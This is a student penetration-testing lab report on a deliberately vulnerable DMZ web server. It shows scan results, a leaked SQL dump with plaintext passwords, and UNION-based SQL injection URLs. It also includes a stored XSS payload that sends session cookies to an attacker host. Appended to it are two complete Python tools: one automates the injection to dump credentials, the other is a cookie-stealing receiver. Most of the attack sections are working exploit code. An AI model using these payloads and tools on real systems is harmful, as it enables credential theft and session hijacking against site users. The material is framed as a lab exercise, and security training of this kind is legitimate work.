# BOT lab4

> Mateusz Suchocki, Kazimierz Kochan

## Basic information

IP ranges: 10.5.1.0/24 and 10.5.2.0/24

Discovered 3 hosts: `10.5.1.10`, `10.5.1.11` and `10.5.2.10`

## 10.5.1.10 (dmza.example.net)

This is a DMZ server with

### Nmap scan

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: exploit.co.il : Articles : Tutorials : Reviews : Videos
```

### Web content discovery

Directory brute-force results (status, method, lines, words, bytes, URL). Note `/config` answers 200 with an empty body, which is what a PHP include file looks like when it is executed rather than served:

```
301      GET        9l       31w      344c http://10.5.1.10/admin => http://10.5.1.10/admin/
301      GET        9l       31w      345c http://10.5.1.10/images => http://10.5.1.10/images/
200      GET       45l      178w     2295c http://10.5.1.10/search
301      GET        9l       31w      346c http://10.5.1.10/uploads => http://10.5.1.10/uploads/
200      GET        0l        0w        0c http://10.5.1.10/config
200      GET      129l      406w     5743c http://10.5.1.10/news
200      GET      142l      387w     5050c http://10.5.1.10/downloads
200      GET       46l      184w     2488c http://10.5.1.10/links
301      GET        9l       31w      347c http://10.5.1.10/database => http://10.5.1.10/database/
200      GET      388l     1071w        0c http://10.5.1.10/index
200      GET      388l     1071w        0c http://10.5.1.10/
200      GET      166l      526w     7108c http://10.5.1.10/articles
200      GET       93l      289w     3829c http://10.5.1.10/videos
200      GET        1l       15w      248c http://10.5.1.10/footer
200      GET        1l        3w     9662c http://10.5.1.10/favicon
200      GET       24l      115w     1295c http://10.5.1.10/menu
200      GET      465l     1202w        0c http://10.5.1.10/results
200      GET       98l      243w    16850c http://10.5.1.10/logo
200      GET       70l      211w     2875c http://10.5.1.10/authors
200      GET        1l        2w       50c http://10.5.1.10/dot
200      GET       35l      154w     1920c http://10.5.1.10/newspage
```

### SQL script

Under the `/database` endpoint there is an `exploit.sql` script (a phpMyAdmin dump) with plaintext credentials:

```
INSERT INTO `members` (`id`, `username`, `password`) VALUES
(1, 'admin', 'P@ssw0rd'),
(2, 'r00t', '1qa2ws'),
(3, 'editor', 'q1w2e3r4');
```

mails and websites of authors:

```
INSERT INTO `authors` (`id`, `name`, `mail`, `site`) VALUES
(1, 'NightRanger', 'shai[at]exploit.co.il', 'http://exploit.co.il'),
(2, 'Joe McCray', 'N/A', 'N/A'),
(3, 'Imperva', 'N/A', 'http://www.imperva.com'),
(4, 'PaulDotCom', 'N/A', 'http://pauldotcom.com'),
(5, 'phpacademy', 'N/A', 'N/A'),
(6, 'Raul Siles', 'N/A', 'http://www.raulsiles.com'),
(7, 'SecuriTeam', 'N/A', 'http://www.securiteam.com'),
(8, 'Wikipedia', 'N/A', 'http://www.wikipedia.org'),
(9, 'Prashant Uniyal', 'N/A', 'N/A'),
(10, 'novaca!ne', 'N/A', 'N/A'),
(11, 'GlaDiaT0R', 'N/A', 'N/A'),
(12, 'zeroday', 'N/A', 'N/A'),
(13, 'Chris Anley', 'N/A', 'N/A'),
(14, 'Kevin Spett', 'N/A', 'N/A'),
(15, 'AnalyseR', 'N/A', 'N/A'),
(16, 'Marezzi', 'N/A', 'N/A'),
(17, 'Dapirates', 'N/A', 'N/A'),
(18, 'CWH Underground', 'N/A', 'N/A'),
(19, 'Frego', 'N/A', 'N/A'),
(20, 'Omni', 'N/A', 'N/A');
```

and some server information:

```
-- phpMyAdmin SQL Dump
-- version 3.3.2deb1
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Sep 24, 2010 at 08:20 AM
-- Server version: 5.1.41
-- PHP Version: 5.3.2-1ubuntu4.5
```

The dump header reports PHP 5.3.2 on Ubuntu while the Nmap banner shows PHP 5.2.6 on Debian, so the dump was generated on a different machine; treat its version information as a hint about the database, not about this web host.

### SQL injection

The `id` parameter of `authors.php` is vulnerable to SQL injection. The query can be closed with a single quote and extended with a UNION of seven columns; the trailing `-- -` comments out the remainder of the original query.
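The payloads used against `authors.php` were built by hand; the script below is an added example (not part of the original report) that reproduces the same steps programmatically: column-count probing with NULL padding, building the UNION payload with the report's URL encoding, and pulling the extracted rows out of the response. The target URL and the 7-column layout come from the report; the marker-based extraction (wrapping the wanted fields in `[[`...`]]` with `CONCAT` so parsing does not depend on the page layout) and the sample response it is tested against are assumptions made for this example.

```python
"""UNION-based SQL injection helper for authors.php?id=... (added example)."""
import re
import urllib.parse
import urllib.request

TARGET = "http://10.5.1.10/authors.php"  # vulnerable endpoint from the report
COLUMNS = 7                               # column count used by the report's payloads
MARK_L, MARK_R = "[[", "]]"               # assumed markers; chosen to survive HTML output


def column_count_payloads(max_cols):
    """Payloads for finding the column count: UNION ALL SELECT with 1..max_cols NULLs.
    The first one that renders without a database error gives the count (7 here)."""
    return [f"1' UNION ALL SELECT {','.join(['NULL'] * n)}-- -"
            for n in range(1, max_cols + 1)]


def union_payload(expr_by_column, table, columns=COLUMNS, base_id="1"):
    """Injected value for the id parameter: expr_by_column maps a 0-based column
    index to a SQL expression; every other column is padded with NULL."""
    cols = [expr_by_column.get(i, "NULL") for i in range(columns)]
    return f"{base_id}' UNION ALL SELECT {','.join(cols)} FROM {table}-- -"


def marked_payload(fields, table, column=2, columns=COLUMNS):
    """Put all wanted fields, '|'-separated and wrapped in markers, into one
    reflected column so extraction works whatever the page layout is."""
    joined = ",'|',".join(fields)  # e.g. username,'|',password
    expr = f"CONCAT('{MARK_L}',{joined},'{MARK_R}')"
    return union_payload({column: expr}, table, columns)


def injected_url(payload, target=TARGET):
    """Encode like the report's URLs: space and quote percent-encoded,
    commas and parentheses left literal."""
    return f"{target}?id={urllib.parse.quote(payload, safe=',()')}"


def extract_rows(html, nfields):
    """Return every MARK_L...MARK_R hit as a tuple of nfields values."""
    pattern = re.escape(MARK_L) + r"(.*?)" + re.escape(MARK_R)
    rows = []
    for hit in re.findall(pattern, html, re.S):
        parts = hit.split("|")
        if len(parts) == nfields:
            rows.append(tuple(parts))
    return rows


def fetch(url):
    """Plain GET; replaced by a stub when testing offline."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def dump(fields, table, fetch=fetch):
    """Dump the given fields of a table via the injection and parse the result."""
    url = injected_url(marked_payload(fields, table))
    return extract_rows(fetch(url), len(fields))


# Constructed stand-in for what authors.php could return for the members dump.
SAMPLE_RESPONSE = """<html><body><h2>Author</h2><table>
<tr><td>1</td><td>[[admin|P@ssw0rd]]</td><td>N/A</td></tr>
<tr><td>2</td><td>[[r00t|1qa2ws]]</td><td>N/A</td></tr>
<tr><td>3</td><td>[[editor|q1w2e3r4]]</td><td>N/A</td></tr>
</table></body></html>"""


if __name__ == "__main__":
    for p in column_count_payloads(8):
        print(injected_url(p))
    print(injected_url(union_payload({2: "CONCAT(schema_name)"},
                                     "information_schema.schemata")))
    for row in dump(["username", "password"], "members"):
        print(":".join(row))
```

`dump()` only works against the lab host; the `fetch` parameter exists so the parsing can be exercised offline against `SAMPLE_RESPONSE`.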
Enumerate the databases:

`http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(schema_name),NULL,NULL,NULL,NULL%20FROM%20information_schema.schemata--%20-`

Dump the `members` table:

`http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,username,password,NULL,NULL,NULL%20FROM%20members--%20-`

The result matches the credentials found in `exploit.sql`:

```
+----+----------+----------+
| id | password | username |
+----+----------+----------+
|  1 | P@ssw0rd | admin    |
|  2 | 1qa2ws   | r00t     |
|  3 | q1w2e3r4 | editor   |
+----+----------+----------+
```

### Webshell upload

The application's database connection file, which holds the MySQL `root` credentials (it uses the legacy `mysql_*` API, removed in PHP 7):

```
<?php
$servername='localhost';                        // Your MySql Server Name or IP address here
$dbusername='root';                             // Login user id here
$dbpassword='You should change this passphrase'; // Login password here
$dbname='exploit';                              // Your database name here

connecttodb($servername,$dbname,$dbusername,$dbpassword);

// Opens the connection into the global $link used by the rest of the application
function connecttodb($servername,$dbname,$dbuser,$dbpassword)
{
    global $link;
    $link=mysql_connect ("$servername","$dbuser","$dbpassword");
    if(!$link){die("Could not connect to MySQL");}
    mysql_select_db("$dbname",$link) or die ("could not open db".mysql_error());
}
?>
```

### Interesting images

Under `/images` there are two interesting images

![](https://i.imgur.com/C1TyoL3.png)

![](https://i.imgur.com/7lgJ505.png)

### Stored XSS

Payload in the note's description:

`<script>new Image().src="http://192.168.111.129/cookie.php?c="+document.cookie;</script>`

Every user who views the infected note sends their session cookie to the attacker's host (192.168.111.129) as the `c` query parameter of an image request. This only works because the session cookie is readable from `document.cookie`, i.e. it is set without the `HttpOnly` flag.

![](https://i.imgur.com/928OGUf.png)

## 10.5.1.11 (dmzb.example.net)

If you need help, write to me

![](https://i.imgur.com/BsKCUEF.png)

## Infrastructure misconfiguration

The firewall should block traffic between the DMZs

![](https://i.imgur.com/xHpf7Va.png)
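For the stored XSS section above: the report's payload points at `http://192.168.111.129/cookie.php`, the attacker-side receiver that is not shown. Below is an added example (not part of the original report) of a minimal receiver written in Python instead of PHP, plus the payload builder and a check for the `HttpOnly` flag that would have stopped this attack. The listener address is the one from the report; the port (80, so the URL needs no port suffix) and the 1x1 GIF response are assumptions of this example.

```python
"""Cookie-stealing receiver for the stored XSS payload (added example)."""
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

LISTENER = "192.168.111.129"  # attacker host from the report

# Minimal 1x1 GIF so the victim browser's Image() request completes quietly.
GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
       b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def xss_payload(listener=LISTENER):
    """The script tag stored in the note; reproduces the report's payload byte for byte."""
    return ('<script>new Image().src="http://' + listener +
            '/cookie.php?c="+document.cookie;</script>')


def cookie_from_path(path):
    """Return the value of the c parameter from a request path, or None."""
    query = urllib.parse.parse_qs(urllib.parse.urlparse(path).query)
    return query.get("c", [None])[0]


def cookie_is_exposed(set_cookie_header):
    """True if a Set-Cookie header lacks HttpOnly, i.e. document.cookie can read it."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


class CookieCatcher(BaseHTTPRequestHandler):
    captured = []  # (client ip, cookie string) for every hit

    def do_GET(self):
        cookie = cookie_from_path(self.path)
        if cookie is not None:
            CookieCatcher.captured.append((self.client_address[0], cookie))
            print(f"[+] {self.client_address[0]} -> {cookie}")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(GIF)))
        self.end_headers()
        self.wfile.write(GIF)

    def log_message(self, *args):  # keep stdout to captured cookies only
        pass


if __name__ == "__main__":
    print("Inject:", xss_payload())
    HTTPServer(("0.0.0.0", 80), CookieCatcher).serve_forever()  # port 80 needs root
```

Run it on the listener host, store the payload in a note, and each viewer's cookie appears on stdout. If the application set its session cookie with `HttpOnly`, `document.cookie` would be empty and `cookie_from_path` would see `c=` with no value.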